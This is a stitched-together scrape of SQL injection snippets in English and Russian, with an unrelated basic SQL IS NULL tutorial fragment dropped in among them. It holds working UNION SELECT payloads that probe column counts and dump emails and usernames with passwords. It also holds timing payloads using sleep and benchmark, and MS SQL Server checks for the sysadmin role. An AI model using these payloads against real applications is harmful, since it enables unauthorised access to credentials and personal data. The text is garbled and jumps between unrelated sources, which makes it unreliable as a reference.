UNION ALL SELECT NULL, *, NULL, NULL FROM email. I understand what this does and why; the hacker needs to create a query that has the same number of columns as the query it's being merged with, and shifted around the * to make sure the emails are displayed.
' UNION SELECT NULL-- ' UNION SELECT NULL,NULL-- ' UNION SELECT NULL,NULL,NULL-- etc.
Null,null,null,null,null,null,null,null,null,null,null,null,null– union all select @@version,user(),sleep(5),benchmark(1000000,MD5(‘A’)),null,null,null,null,null...
Почему используется значение NULL? Все просто, типы данных в каждом столбце должны быть совместимы между исходным и внедренным запросами.
1' UNION SELECT null,null,null-- - Worked. You should use nullvalues as in some cases the type of the columns of both sides of the query must be the same and null is valid in every case.
The IS NULL operator is used to test for empty values (NULL values). The following SQL lists all customers with a NULL value in the "Address" field: ExampleGet your own SQL Server. SELECT CustomerName, ContactName, Address FROM Customers WHERE Address IS NULL
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –- Если нет ошибки, значит синтаксис верный, т.е. используется MS SQL Server.
' Union select 'a',null,null,null-- ' union select null,'a',null,null-- ' Union select null,null,'a',null-- ' union select
Also try ‘bulkadmin’, ‘systemadmin’ and other values from the documentation SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username. SELECT name FROM master..syslogins WHERE sysadmin = ’1′ — tested on 2005.
NULL UNION ALL SELECT username,password,null,null FROM users WHERE username LIKE CHAR(34,37,97,100,109,105,110,37,34)/*. The syntax of the Char() function changes slightly when dealing with Microsoft SQL Server.